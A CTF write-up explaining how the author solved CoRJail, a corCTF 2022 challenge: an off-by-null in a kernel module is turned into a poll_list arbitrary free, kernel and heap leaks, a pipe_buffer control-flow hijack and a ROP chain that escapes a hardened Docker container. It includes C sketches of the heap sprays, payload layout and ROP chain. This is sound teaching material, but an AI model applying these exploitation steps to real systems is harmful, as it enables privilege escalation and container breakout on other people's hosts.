CoRJail is a kernel exploitation / Docker escape challenge designed for corCTF 2022. Players were asked to escape from a hardened Docker container with custom seccomp filters by exploiting an Off-By-Null vulnerability in a Linux Kernel Module accessible via procfs. In this article, I present a novel kernel exploitation technique I originally used in the Google kCTF Vulnerability Reward Program to compromise Google’s hardened Kubernetes infrastructure, escaping from an nsjail and gaining root privileges on a Container Optimized OS. Let’s get started!
Last year, FizzBuzz101 and I designed two kernel exploitation challenges for corCTF 2021, Fire of Salvation and Wall of Perdition, demonstrating a novel technique to get arbitrary read and arbitrary write in the Linux kernel using msg_msg objects and userfaultfd. Over the past year, the technique has been used extensively in real-world exploits and was later extended to work with FUSE instead of userfaultfd.
For corCTF 2022, we decided to do the same, designing two challenges whose solutions required a novel approach. I decided to write a kernel exploitation / Docker escape challenge, CoRJail, demonstrating a novel technique I originally used to compromise Google’s kCTF Kubernetes infrastructure. This approach makes it possible to obtain a powerful arbitrary free primitive in almost every general purpose cache by exploiting poll_list objects. FizzBuzz101, instead, designed a challenge, Cache of Castaways, whose solution required a cross-cache overflow into cred_jar to corrupt the current task’s cred structure and get root privileges.
CoRJail consists of a hardened Docker container running on a custom Debian Bullseye image (improperly called CoROS :P). The default Docker seccomp profile was modified to block multiple syscalls, including msgget()/msgsnd() and msgrcv(). On the other hand, certain syscalls were made available, like add_key() and keyctl(), allowing access to the Linux Kernel Key Retention Service from within the container. The custom seccomp profile can be found here.
The kernel, 5.10.127, was patched to enable per-CPU syscall usage statistics, using a modified version of this recent kernel patch: procfs - add syscall statistics. Certain subsystems, like io_uring and nftables, were not included in the kernel to reduce attack surface.
All modern protections, such as CONFIG_SLAB_FREELIST_HARDENED, were enabled. CONFIG_STATIC_USERMODEHELPER was set to true, forcing usermode helper calls through a single binary, and CONFIG_STATIC_USERMODEHELPER_PATH was set to an empty string. In other words, no modprobe_path trick. Finally, I unset CONFIG_KALLSYMS_ALL, making many symbols unavailable in /proc/kallsyms.
The vulnerable Linux Kernel Module, CoRMon, accessible through a procfs interface, was created to display per-CPU syscall counts, restricting the displayed result to the syscalls specified in a filter.
Users were allowed to set a new filter using echo -n 'syscall_1,syscall_2,...' > /proc_rw/cormon. For example, to get the per-CPU usage count of read() and write(), a user can simply use echo -n 'sys_read,sys_write' > /proc_rw/cormon.
The default CoRMon filter was actually a hint: it displayed many of the syscalls I used in my exploit, including poll(), keyctl() and setxattr().
If you want to try to solve the challenge before reading the rest of the article, you can find it in the corCTF 2022 Public Archive. Please note that I could not upload the coros.qcow2 image to GitHub because of its size, so you will need to build it yourself using the provided script.
Exploit an Off-By-Null in kmalloc-4k to corrupt a poll_list object and obtain an arbitrary free primitive. Free a user_key_payload structure and corrupt it to get an OOB Read. Leak a heap object / kernel pointer. Reuse poll_list to arbitrarily free a pipe_buffer structure, hijack control flow and escape from the container to get a CoR Flag License key, then guess the correct options on the CoR Flag License Website to get the actual flag.
It’s Only A Zero, What Could Go Wrong?
Given the complexity of the exploitation phase and the 48-hour limit, I decided to make the bug extremely easy to spot and trigger. On the other hand, I decided not to provide source code, considering that the reverse engineering process would not take too long. Here is the original CoRMon source code:
We can interact with the module through a procfs interface using read() and write(). When we use write(), the cormon_proc_write() function is called to process the user input. The cormon_seq_show() function, instead, is used to display syscall information when we use read().
As we can see, there is a clear Off-By-Null in cormon_proc_write(). Let’s extract the function from the source code and ignore the rest:
If the number of bytes written is greater than PAGE_SIZE (4096), the len variable is set to PAGE_SIZE - 1; otherwise it is set to count.
Afterwards, a chunk of 4096 bytes is allocated in kmalloc-4k and the list of syscalls is copied from user space to kernel space, where it will be parsed by the update_filter() function. The list, now in kernel space, is then null terminated.
The check clearly does not cover the case where the number of bytes written is exactly PAGE_SIZE. In that case, len is equal to count (4096), and the line syscalls[len] = '\x00' results in syscalls[4096] = '\x00', writing the null byte one past the end of the 4096-byte chunk.
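The length check can be modelled in user space to see exactly which input sizes are affected. This is only a sketch of the logic described above, not the module's code; cormon_len() and terminator_is_oob() are names made up for the illustration.

```c
#include <assert.h>
#include <stddef.h>

#define PAGE_SIZE_SKETCH 4096u  /* stands in for the kernel's PAGE_SIZE */

/* Mirrors the check described above: only count > PAGE_SIZE is clamped. */
static size_t cormon_len(size_t count)
{
    return count > PAGE_SIZE_SKETCH ? PAGE_SIZE_SKETCH - 1 : count;
}

/* Returns 1 when the terminator at syscalls[len] lands outside the 4096-byte chunk. */
static int terminator_is_oob(size_t count)
{
    return cormon_len(count) >= PAGE_SIZE_SKETCH;
}
```

Only a write of exactly 4096 bytes makes terminator_is_oob() return 1: smaller writes terminate inside the chunk, and larger ones are clamped to index 4095.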
At first glance, considering the hardened kernel and the limited attack surface from within the container, a single zero written out of bounds does not seem too dangerous. As we are going to demonstrate, however, it is more than enough to escape from the container and get root privileges on the host.
A Dive Into poll_list Objects
As we mentioned in the previous section, the attack surface from within the container is very limited. For example, unshare is blocked by default by seccomp, so it is not possible to create user namespaces, and this prevents us from accessing many kernel features. Many other syscalls are also blocked, including msgget(), msgsnd() and msgrcv(), so this time the good old msg_msg is left out of the picture. Instead, our exploitation process will mainly rely on poll_list objects, which can be used from within the container without meeting any specific requirements.
The technique covered in this article is a special case of the one I used on Google’s systems: in that case I had a virtually unlimited Out-Of-Bounds Write primitive, whereas here we only have a single null byte written out of bounds.
poll() accepts three arguments:
- fds: an array of pollfd structures.
- nfds: the number of pollfd structures in the fds array.
- timeout: the number of milliseconds poll() should block waiting for an event to occur.
The poll_list structure is composed of a pointer to the next poll_list, a length field corresponding to the number of pollfd structures in the entries array, and entries, a flexible array of pollfd structures. Each entry is 8 bytes in size.
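For reference, the layout can be replicated in user space. The sketch below assumes an x86-64 (LP64) target; poll_list_sketch and poll_list_bytes() are illustrative names, while struct pollfd comes from the standard poll.h header.

```c
#include <assert.h>
#include <poll.h>
#include <stddef.h>

/* User-space replica of the structure described above (x86-64 assumed). */
struct poll_list_sketch {
    struct poll_list_sketch *next; /* first QWORD: the pointer the exploit targets */
    int len;                       /* number of entries that follow */
    struct pollfd entries[];       /* 8 bytes each: int fd, short events, short revents */
};

/* Bytes requested from the allocator for a poll_list holding n entries. */
static size_t poll_list_bytes(size_t n)
{
    return sizeof(struct poll_list_sketch) + n * sizeof(struct pollfd);
}
```

With a 16-byte header, a single entry needs 24 bytes (kmalloc-32) and 510 entries need exactly 4096 bytes (kmalloc-4k).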
When we use the poll() syscall, do_sys_poll() is called in kernel-space. This function is responsible for copying the entries we passed to poll() in the fds array from user-space to kernel-space:
do_sys_poll() has two paths, a fast one and a slow one. As we can see at the beginning of the function, stack_pps, a buffer of 256 bytes, is defined. It is used to store the first 30 pollfd entries. This is the fast path: entries are stored on the stack to save memory and improve speed.
If we submit more than 30 pollfd entries, we enter the slow path, and the remaining ones are allocated on the kernel heap. This means that by controlling the number of monitored file descriptors, we can control the allocation size, ranging from kmalloc-32 to kmalloc-4k.
A maximum of POLLFD_PER_PAGE (510) entries can be allocated per page. If this limit is exceeded, a new poll_list is allocated to store the remaining entries, and it is connected to the previous one in a singly linked list. The for loop continues until all entries have been stored in kernel memory.
Let’s say, for example, that we call poll() with 30 + 510 + 1 file descriptors. The first 30 entries are stored on the stack, so in kernel space this results in a poll_list with 510 entries allocated in kmalloc-4k and a second poll_list with a single entry allocated in kmalloc-32. The two heap structures are connected in a singly linked list, with the kmalloc-4k poll_list pointing to the kmalloc-32 one.
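The arithmetic behind this example can be checked with a small user-space model of the allocation loop. It is a sketch under the sizes quoted above (16-byte header, 8-byte entries, 30 stack entries, 510 entries per page); heap_chunks() is a hypothetical helper, not a kernel function.

```c
#include <assert.h>
#include <stddef.h>

#define POLL_LIST_HDR   16u   /* sizeof(struct poll_list) on x86-64 */
#define POLLFD_SIZE      8u   /* sizeof(struct pollfd) */
#define N_STACK_PPS     30u   /* entries that fit in the 256-byte stack buffer */
#define POLLFD_PER_PAGE 510u  /* (4096 - 16) / 8 */

/*
 * Fills sizes[] with the allocation size of each heap poll_list that a
 * poll() call with nfds entries would need, and returns how many there are.
 */
static size_t heap_chunks(size_t nfds, size_t *sizes, size_t max)
{
    size_t n = 0;
    size_t todo = nfds > N_STACK_PPS ? nfds - N_STACK_PPS : 0;

    while (todo > 0 && n < max) {
        size_t len = todo < POLLFD_PER_PAGE ? todo : POLLFD_PER_PAGE;

        sizes[n++] = POLL_LIST_HDR + len * POLLFD_SIZE;
        todo -= len;
    }
    return n;
}
```

For nfds = 541 the model yields two heap chunks of 4096 and 24 bytes, which is the kmalloc-4k to kmalloc-32 chain used throughout the exploit. For nfds = 511 it yields a single 3864-byte chunk, because the first 30 entries never leave the stack.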
After all poll_list objects have been allocated, there is a call to do_poll(): it monitors the provided file descriptors until a specific event occurs or the timer expires. The end_time variable here corresponds to the timeout we passed as the third argument to the poll() syscall. This means that poll_list objects can be kept in memory for an arbitrary amount of time; when the timer expires, they are automatically freed.
The very interesting part is how poll_list structures are freed: a while loop traverses the singly linked list, freeing each of them. Now let’s look at what we have from an attacker’s perspective.
We have a structure that can be allocated in multiple caches, ranging from kmalloc-32 to kmalloc-4k, and the object pointed to by its next field (first QWORD) is automatically freed when a timer that we control expires. This means that, given an Out-Of-Bounds Write or a Use-After-Free Write primitive, we can overwrite the next field of a poll_list structure with the address of a target object. Once the timer expires, that object will be automatically freed.
The only constraint is that the first QWORD of the target object must be NULL; otherwise the while loop will treat it as a valid pointer and keep traversing the list. This is not a problem: we can use a misaligned arbitrary free primitive, or we can simply target objects whose first QWORD is equal to zero.
In the specific case of kmalloc-4k, if the poll_list next field already contains a valid pointer to another poll_list, we can corrupt it with a partial overwrite (even with a single byte), making it point to another object. When the timer expires, the kernel will be tricked into freeing the wrong object. This trick is exactly what we are going to use in our exploit.
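To make the single-byte case concrete, here is a user-space simulation. It assumes a little-endian machine and 32-byte objects packed back to back, so that clearing the lowest byte of a pointer moves it to the first object of the same 256-byte-aligned group. The node and obj32 types, the region array and all function names are illustrative; the walk has the same shape as the cleanup loop described above but records addresses instead of freeing them.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct node { struct node *next; };                 /* only the first QWORD matters */
struct obj32 { struct node hdr; unsigned char pad[24]; };

/* Eight 32-byte objects in one 256-byte-aligned group, like part of a kmalloc-32 slab. */
static _Alignas(256) struct obj32 region[8];

/* Effect of the off-by-null on a little-endian pointer: the lowest byte becomes 0. */
static uint64_t null_low_byte(uint64_t ptr)
{
    return ptr & ~(uint64_t)0xff;
}

/* Index of a 32-byte object inside its 256-byte-aligned group. */
static unsigned slot_in_group(uint64_t ptr)
{
    return (unsigned)((ptr & 0xff) / 32);
}

/* Same shape as the cleanup loop; records each object instead of calling kfree(). */
static size_t walk_and_record(struct node *first, struct node **freed, size_t max)
{
    size_t n = 0;
    struct node *walk = first;

    while (walk && n < max) {
        struct node *pos = walk;

        walk = walk->next;   /* must read NULL from the victim to stop here */
        freed[n++] = pos;
    }
    return n;
}
```

If the real tail poll_list sits in slot 5 of the group, the corrupted pointer lands on slot 0, and the walk "frees" whatever object lives there, provided its first QWORD is zero. If the original pointer already ended in 0x00, the overwrite changes nothing, which is one reason to spray many chains.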
The following code can be used to allocate poll_list structures in kernel space. Note that we need to use threads to spray this object because the poll() syscall blocks until a specific event occurs or the timer expires.
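A minimal sketch of such a spray is shown here, assuming POSIX threads and a descriptor that stays idle for the whole timeout. The poll_job structure and the start_poll_thread() / join_poll_thread() helpers are names chosen for this illustration and may differ from the ones in the final exploit.

```c
#include <assert.h>
#include <poll.h>
#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

#define N_STACK_PPS 30  /* entries kept on the kernel stack by do_sys_poll() */

struct poll_job {
    pthread_t tid;
    struct pollfd *fds;
    nfds_t nfds;
    int timeout_ms;
    int result;
};

static void *poll_worker(void *arg)
{
    struct poll_job *job = arg;

    /* Blocks here; the kernel-side poll_list objects live until poll() returns. */
    job->result = poll(job->fds, job->nfds, job->timeout_ms);
    return NULL;
}

/*
 * Starts one thread polling heap_entries descriptors beyond the 30 that stay
 * on the stack. fd should not report any event during the timeout (for
 * example the read end of an idle pipe).
 */
static int start_poll_thread(struct poll_job *job, int fd, nfds_t heap_entries,
                             int timeout_ms)
{
    job->nfds = N_STACK_PPS + heap_entries;
    job->timeout_ms = timeout_ms;
    job->result = -1;
    job->fds = calloc(job->nfds, sizeof(*job->fds));
    if (!job->fds)
        return -1;
    for (nfds_t i = 0; i < job->nfds; i++) {
        job->fds[i].fd = fd;
        job->fds[i].events = POLLERR;
    }
    if (pthread_create(&job->tid, NULL, poll_worker, job) != 0) {
        free(job->fds);
        return -1;
    }
    return 0;
}

/* Waits for the timer to expire (which frees the poll_list chain) and cleans up. */
static int join_poll_thread(struct poll_job *job)
{
    pthread_join(job->tid, NULL);
    free(job->fds);
    return job->result;
}
```

Calling start_poll_thread(&job, fd, 510 + 1, timeout_ms) would request the kmalloc-4k plus kmalloc-32 chain discussed earlier. Note that poll() rejects nfds values above the RLIMIT_NOFILE soft limit, so that limit has to be at least 541 for this to work.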
The Exploit - From Zero To Information Leak
The strategy for the first part of the exploit consists of using the Off-By-Null in kmalloc-4k to corrupt the next field of a poll_list structure chained to another one in kmalloc-32, making the corrupted pointer point to another object in the slab. When the timer expires, that object will be automatically freed.
We need to choose a target structure that, once arbitrarily freed, can be corrupted to give us an Out-Of-Bounds Read primitive and a subsequent information leak. There are multiple elastic objects in the Linux kernel that may do the trick. A good candidate could be simple_xattr, but we need the first QWORD of the target object to be NULL, so we cannot use it. Since add_key() and keyctl() are not blocked by the custom seccomp profile, we can opt for user_key_payload instead.
The problem with this structure is that its first member, struct rcu_head rcu, is not initialized, and since the structure is allocated with kmalloc, the first QWORD might not be NULL. A practical solution comes from setxattr(): we can use it to fill the chunk with zeros before allocating a user key.
With setxattr(), we can allocate a chunk of arbitrary size and fill it with arbitrary data; the chunk is then automatically freed right before the function returns. We can exploit this function to make sure the uninitialized member of user_key_payload is actually zero. We simply need to call setxattr() right before alloc_key(): because of the freelist’s LIFO behavior, once the chunk used by setxattr() is allocated, filled with zeros and then freed, it will be reused by the user key. With this in mind, we can start writing our exploit.
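The setxattr() / add_key() pairing can be sketched as follows. This assumes x86-64, where the user_key_payload header occupies 24 bytes before the data; zeroed_key() and key_data_len_for() are hypothetical helpers, the "user.x" attribute name is arbitrary, and path must name an existing file.

```c
#include <assert.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/xattr.h>
#include <unistd.h>

#define USER_KEY_HDR 24            /* rcu_head (16) + datalen (2) + padding, x86-64 */
#ifndef KEY_SPEC_PROCESS_KEYRING
#define KEY_SPEC_PROCESS_KEYRING (-2)
#endif

/* Largest payload that keeps a user_key_payload inside the given cache size. */
static size_t key_data_len_for(size_t cache_size)
{
    return cache_size - USER_KEY_HDR;
}

/*
 * Zero a chunk of cache_size bytes through setxattr(), then immediately
 * allocate a user key that is expected to reuse it. The setxattr() result is
 * not checked: only the temporary kernel buffer matters for the trick.
 */
static long zeroed_key(const char *path, const char *desc, size_t cache_size)
{
    char zeros[4096] = {0};
    char data[4096];
    size_t dlen;

    if (cache_size <= USER_KEY_HDR || cache_size > sizeof(zeros))
        return -1;
    dlen = key_data_len_for(cache_size);
    memset(data, 'A', dlen);
    (void)setxattr(path, "user.x", zeros, cache_size, XATTR_CREATE);
    return syscall(SYS_add_key, "user", desc, data, dlen,
                   KEY_SPEC_PROCESS_KEYRING);
}
```

For kmalloc-32 this means zeroed_key(path, desc, 32), which leaves 8 bytes of key data after the 24-byte header. Each key needs a distinct description, otherwise add_key() updates the existing key instead of creating a new one.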
First, we assign the current process to core 0 using assign_to_core() (a sched_setaffinity() wrapper), since we are working in a multi-core environment and slabs are per-CPU. Then, we start spraying many seq_operations structures in kmalloc-32 to fill partial slabs, so that the next allocations end up in a brand new slab.
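Both steps are short enough to sketch. assign_to_core() follows the description above; spray_seq_ops() is a hypothetical helper, and using /proc/self/stat as the file to open is an assumption made here, chosen because it is served through single_open() and therefore allocates one seq_operations per open.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <sched.h>
#include <unistd.h>

/* Pin the calling thread to one CPU so allocations hit that CPU's slabs. */
static int assign_to_core(int core)
{
    cpu_set_t mask;

    CPU_ZERO(&mask);
    CPU_SET(core, &mask);
    return sched_setaffinity(0, sizeof(mask), &mask);
}

/*
 * Open path up to count times, storing the descriptors in fds[].
 * Returns how many opens succeeded; the objects stay allocated until the
 * descriptors are closed.
 */
static int spray_seq_ops(const char *path, int *fds, int count)
{
    int n = 0;

    while (n < count) {
        int fd = open(path, O_RDONLY);

        if (fd < 0)
            break;
        fds[n++] = fd;
    }
    return n;
}
```

Keeping the descriptors in an array matters later in the exploit, when the seq_operations structures are released by closing them.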
We proceed using alloc_key() (a simple add_key() wrapper) to spray many user_key_payload structures in kmalloc-32. As explained above, we use setxattr() to make sure the chunk is actually zeroed out before a new user key is allocated.
Now we finally spray poll_list structures in kmalloc-4k, chained to poll_list in kmalloc-32. At this point the situation in memory will probably be similar to [Fig. 1A], with unallocated chunks in white, poll_list in green, and user_key_payload in orange.
We can continue spraying more user keys in kmalloc-32 to completely saturate the slab. [Fig. 1B]
We are ready to trigger the Off-By-Null bug, hijack a poll_list next pointer and trigger the arbitrary free:
We can trigger the allocation of a chunk in kmalloc-4k simply by writing 4096 bytes to the CoRMon procfs interface. This will also cause a null byte to be written out of bounds, corrupting the next object in memory. Since we sprayed poll_list structures in kmalloc-4k, and each one has a pointer to a poll_list in kmalloc-32, we will be able to corrupt one of the pointers, making it point to one of the user keys we sprayed in the previous step. [Fig. 2A]
Now we can simply use join_poll_threads() and wait until the timers expire and the poll_list objects are automatically freed. Since we corrupted one of the singly linked lists, a user_key_payload will be arbitrarily freed. [Fig. 2B]
We caused a potential Use-After-Free situation. Now we need to exploit it and corrupt the user key to obtain an Out-Of-Bounds Read primitive:
First, we spray many seq_operations structures in kmalloc-32. One of them will overwrite the user key we freed in the previous step, corrupting its datalen field (an unsigned short) with the two lower bytes of the single_next pointer. In our case, the two lower bytes of single_next are 0x4330, so this gives us a huge Out-Of-Bounds Read primitive. A proc_single_show() pointer, instead, will overwrite the data field of the user key. You can see the seq_operations structures in yellow in [Fig. 3A]; one of them corrupted the key.
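The overlap can be reproduced in user space with two 32-byte structures. The layouts below are x86-64 replicas written for this illustration, little-endian byte order is assumed, and only the low 16 bits (0x4330) of the example pointer come from the challenge; the rest of the address is a placeholder.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

struct seq_operations_sketch {
    uint64_t start, stop, next, show;   /* four function pointers */
};

struct user_key_payload_sketch {
    uint64_t rcu_next, rcu_func;        /* struct rcu_head */
    uint16_t datalen;                   /* overlaps the low bytes of .next */
    uint8_t  pad[6];
    uint8_t  data[8];                   /* overlaps .show */
};

_Static_assert(sizeof(struct seq_operations_sketch) ==
               sizeof(struct user_key_payload_sketch), "both must be 32 bytes");

/* datalen as the key code would read it once seq_operations reuses the chunk. */
static uint16_t datalen_after_overlap(const struct seq_operations_sketch *ops)
{
    struct user_key_payload_sketch key;

    memcpy(&key, ops, sizeof(key));
    return key.datalen;
}

/* First QWORD of the key data, i.e. the value a read of the key returns first. */
static uint64_t data_after_overlap(const struct seq_operations_sketch *ops)
{
    struct user_key_payload_sketch key;
    uint64_t first;

    memcpy(&key, ops, sizeof(key));
    memcpy(&first, key.data, sizeof(first));
    return first;
}
```

With next ending in 0x4330, the key appears to hold 0x4330 (17200) bytes of data, far beyond its 32-byte chunk, and the first value read back is the show pointer.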
We can now use the leak_kernel_pointer() function and iterate through all the keys until we leak the proc_single_show address. This way we identify the corrupted key and can calculate the kernel base address. Now we need to reuse the Out-Of-Bounds Read primitive to leak a heap address.
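One way to recognise the leaked pointer is sketched below. It relies on the fact that KASLR moves the kernel image in steps that are at least page-aligned, so the low 12 bits of a symbol's address do not change. find_kernel_base() is a hypothetical helper and symbol_offset (the distance of proc_single_show from the kernel base) must be taken from the target kernel; the value used in any example is a placeholder.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Scan the QWORDs returned by an out-of-bounds key read for a kernel text
 * pointer whose low 12 bits match the expected symbol.
 * Returns the computed kernel base, or 0 when nothing matches.
 */
static uint64_t find_kernel_base(const uint64_t *leak, size_t words,
                                 uint64_t symbol_offset)
{
    for (size_t i = 0; i < words; i++) {
        uint64_t v = leak[i];

        if ((v >> 32) == 0xffffffffu &&
            (v & 0xfff) == (symbol_offset & 0xfff))
            return v - symbol_offset;
    }
    return 0;
}
```

A key whose read returns no match is simply not the corrupted one, so the same check doubles as the way to identify which key was hit.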
When we open a ptmx, two structures of interest are allocated: the well-known tty_struct in kmalloc-1024 and tty_file_private in kmalloc-32. Each tty_file_private structure has a pointer to its tty_struct, which means that by leaking a tty_file_private in kmalloc-32 we can obtain the address of a tty_struct object in kmalloc-1024.
We can free all the keys in kmalloc-32 (orange chunks in [Fig. 3A]), with the exception of the corrupted key, and replace them with tty_file_private structures (blue chunks in [Fig. 3B]) by opening many ptmx devices. Then we call leak_heap_pointer() and use the Out-Of-Bounds Read primitive to leak the address of a tty_struct object. [Fig. 3B]
The Exploit - Hijacking Control Flow
We have made some progress: starting from a single Null Byte Overflow, we now know the kernel base address and the address of an object in kmalloc-1024. Now we need to arbitrarily free this object.
First, we free all the seq_operations structures in kmalloc-32 (yellow chunks in [Fig. 3A-3B]), then we replace them with poll_list objects (green chunks in [Fig. 4A]). Note that the seq_operations structure used to corrupt the user key is also freed and replaced by a poll_list structure. [Fig. 4A]
Now we free the corrupted key, causing a potential Use-After-Free situation over the poll_list. To exploit the Use-After-Free, we reuse the setxattr() trick from the first stage, but this time, instead of zeroing out the chunk, we set its first QWORD to target object - 0x18 bytes, then we allocate a user_key_payload structure to consolidate the setxattr buffer in memory. In other words, since the chunk used by setxattr() is automatically freed when the function returns, we allocate a user key (remember, the first member of a user_key_payload structure is not initialized) to prevent the first QWORD we just set from being overwritten by a subsequent allocation. Doing so, we overwrite the next field of the poll_list structure in kmalloc-32 with the address of our target object minus 0x18 bytes. [Fig. 4B]
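The 0x18 presumably matches the size of the user_key_payload header on x86-64: freeing target - 0x18 means that a key later allocated on that chunk has its data starting exactly at the target object. The sketch below builds the 32-byte setxattr() buffer under that assumption; fake_next_for() and build_next_overwrite() are illustrative names.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define USER_KEY_HDR 0x18u  /* assumed offset of the data inside user_key_payload */

/* Value to plant in poll_list->next so that key data would start at target. */
static uint64_t fake_next_for(uint64_t target)
{
    return target - USER_KEY_HDR;
}

/* Build the 32-byte setxattr() buffer: the first QWORD is the fake next pointer. */
static void build_next_overwrite(uint8_t buf[32], uint64_t target)
{
    uint64_t next = fake_next_for(target);

    memset(buf, 0, 32);
    memcpy(buf, &next, sizeof(next));
}
```

The first-QWORD constraint still applies at the misaligned address: the 8 bytes at target - 0x18, which belong to the tail of the neighbouring object, must read as zero when the list is walked.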
Originally my goal was to arbitrarily free a tty_struct and get RIP control by overwriting its tty_operations pointer. Then I changed my mind (too many checks!) and decided to target a pipe_buffer structure.
We proceed by freeing all the TTYs, closing the ptmx devices, then we spray many pipe_buffer objects. This way we replace all the tty_struct objects with pipe_buffer objects in kmalloc-1024. Then, we wait until the timers expire, and the pipe_buffer object pointed to by the next field of the corrupted poll_list is automatically freed. [Fig. 5A]
Finally, we free all user keys and reallocate them in kmalloc-1024: we use them to spray our ROP-chain. One of the key payloads will overwrite the target pipe_buffer, overwriting the anon_pipe_buf_ops pointer with a stack pivot gadget. Now we only need to close all pipes, triggering the call to pipe_release(). This will execute our stack pivot gadget, and we will finally be able to hijack control flow. [Fig. 5B]
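As a rough sketch of how such a payload could be laid out: to my knowledge, on 5.10 x86-64 the ops pointer sits at offset 0x10 of pipe_buffer and release is the second slot (offset 0x08) of pipe_buf_operations. The position of the fake table inside the payload (table_off) is a free choice in this sketch, the pivot address is a placeholder, and build_pipe_payload() is a made-up helper rather than the code from the final exploit.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PIPE_BUF_OPS_OFF 0x10u  /* assumed offsetof(struct pipe_buffer, ops) */
#define OPS_RELEASE_OFF  0x08u  /* assumed offsetof(struct pipe_buf_operations, release) */

/*
 * Lay out key data that will sit on top of the freed pipe_buffer at target.
 * The ops field is redirected to a fake table stored inside the same payload,
 * whose release slot holds the stack pivot gadget.
 */
static int build_pipe_payload(uint8_t *payload, size_t size, uint64_t target,
                              size_t table_off, uint64_t pivot)
{
    uint64_t fake_ops = target + table_off;

    /* Keep the fake table clear of the ops field and inside the payload. */
    if (table_off < PIPE_BUF_OPS_OFF + 8 ||
        table_off + OPS_RELEASE_OFF + 8 > size)
        return -1;
    memset(payload, 0, size);
    memcpy(payload + PIPE_BUF_OPS_OFF, &fake_ops, sizeof(fake_ops));
    memcpy(payload + table_off + OPS_RELEASE_OFF, &pivot, sizeof(pivot));
    return 0;
}
```

Because the heap address of the target is already known from the earlier leak, the fake table can live in the same chunk, and no second controlled allocation is needed.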
The Exploit - Escaping From The Container
We started with a single Off-By-Null vulnerability and we finally managed to hijack control flow. The last piece of the puzzle is the ROP-chain used to escape from the container. Let’s take a look at what I used in the exploit:
The first part of the ROP-chain is nothing special. We use a stack pivot gadget to hijack control flow, then prepare_kernel_cred() and commit_creds() to escalate privileges, and then we locate the Docker container task using find_task_by_vpid() and use switch_task_namespaces() to replace its nsproxy structure with init_nsproxy. Unfortunately, in this case, this is not enough to escape from the container.
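The shape of this first stage can be sketched as a plain array builder. Everything in the gadgets structure is hypothetical and must be resolved against the real kernel image, the existence of a clean "mov rdi, rax; ret" gadget is an assumption, and so are the NULL argument to prepare_kernel_cred() and the use of PID 1 for the container task.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Addresses the caller must resolve (kernel base + offset); all hypothetical. */
struct gadgets {
    uint64_t pop_rdi_ret;
    uint64_t pop_rsi_ret;
    uint64_t mov_rdi_rax_ret;        /* moves a return value into the first argument */
    uint64_t prepare_kernel_cred;
    uint64_t commit_creds;
    uint64_t find_task_by_vpid;
    uint64_t switch_task_namespaces;
    uint64_t init_nsproxy;
};

/* Writes the privilege-escalation and namespace-switch stage; returns words written. */
static size_t build_first_stage(uint64_t *rop, size_t max, const struct gadgets *g)
{
    const uint64_t chain[] = {
        g->pop_rdi_ret, 0,                /* rdi = NULL */
        g->prepare_kernel_cred,           /* rax = prepare_kernel_cred(NULL) */
        g->mov_rdi_rax_ret,
        g->commit_creds,                  /* commit_creds(rax) */
        g->pop_rdi_ret, 1,                /* rdi = 1 (assumed PID of the container task) */
        g->find_task_by_vpid,             /* rax = find_task_by_vpid(1) */
        g->mov_rdi_rax_ret,
        g->pop_rsi_ret, g->init_nsproxy,  /* rsi = &init_nsproxy */
        g->switch_task_namespaces,        /* switch_task_namespaces(rdi, rsi) */
    };
    size_t n = sizeof(chain) / sizeof(chain[0]);

    if (n > max)
        return 0;
    for (size_t i = 0; i < n; i++)
        rop[i] = chain[i];
    return n;
}
```

Real gadgets usually carry extra pops or side effects, so a working chain needs padding words that this sketch leaves out.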
In Docker containers, unlike Google’s kCTF, setns() is blocked by default by seccomp, which means that we cannot use it to enter another namespace after returning to user space. We need to find an alternative approach and implement it in the ROP-chain.
Reading the setns() source code, we can see that it calls commit_nsset() to actually move the task into a different namespace. We can reproduce part of its behavior using copy_fs_struct() to clone the init_fs structure, then we locate the current task using find_task_by_vpid() and manually install the new fs_struct using a write-what-where gadget. Finally, we can use the KPTI trampoline with swapgs_restore_regs_and_return_to_usermode to get a shell on the host. Here is the final exploit in action:
As you can see, the flag file did not contain a real flag, but a weird message:
Hello Hacker. Unfortunately, the flag you are looking for is not here. You need a CoR Flag License to unlock it. Please visit https://flag-license.cor.team to buy one. Use the CoR Promo Code WINDOWSISMYLIFE-06612CF0B3DC2776 to get a $0.99 discount. Regards, The CoR Team.
I wanted to insert a small Easter egg in the challenge, so I created a fake website. Users were asked to visit https://flag-license.cor.team (note that at the time of writing the website is still up, but when you read the article it might be down) and fill in a CoR Flag License Purchase Form to buy a CoR Flag License for the modest price of $1337.00/day. The CoR Promo Code WINDOWSISMYLIFE-06612CF0B3DC2776 (cough cough …note the sarcasm… cough cough) is the lucky one, and the player who uses it wins a free CoR Flag License. The license code can later be used to unlock the real flag.
The final exploit can be found here: corjail_exploit.c.
Note: In the exploit I use the assign_to_core() function to assign the process to another core before creating poll threads. This is useful to reduce noise due to thread creation on core 0 slabs. Once a thread has been created, it is assigned back to core 0 right before the poll() call using assign_thread_to_core(), a pthread_attr_setaffinity_np() wrapper.
poll_list objects can be used to get a powerful arbitrary free primitive in almost every general purpose cache. Many recent vulnerabilities can be exploited using this structure in the complete absence of msg_msg objects.
This challenge was a hard one and, considering the 48-hour limit and the presence of other hard challenges, it only had one solver. A big shout-out goes to Kylebot for getting first blood. It turns out that extended security attributes were usable inside the container without requiring any special capability, so he could solve the challenge by transforming the Off-By-Null in kmalloc-4k into a Cross-Cache Null Byte Overflow, targeting the list.next pointer of a simple_xattr structure in kmalloc-192.
This cache is unaligned, so he made the corrupted pointer point into the middle of another simple_xattr object in the same slab. There, he forged a fake header and obtained an Out-Of-Bounds Read primitive, which led to an information leak.
Finally, he used the recent unlinking attack with simple_xattr to overwrite the file_operations pointer of a file structure with a controlled heap address. From here he could hijack control flow and use a ROP-chain to escape from the container. What a crazy approach, isn’t it?
If you have any question or need any clarification, feel free to contact me. You can find my contact information in About.
You can download CoRJail from the corCTF 2022 Public Archive.
Syscall statistics patch
Utilizing msg_msg Objects For Arbitrary Read And Arbitrary Write In The Linux Kernel
- https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html (Part 1: Fire Of Salvation)
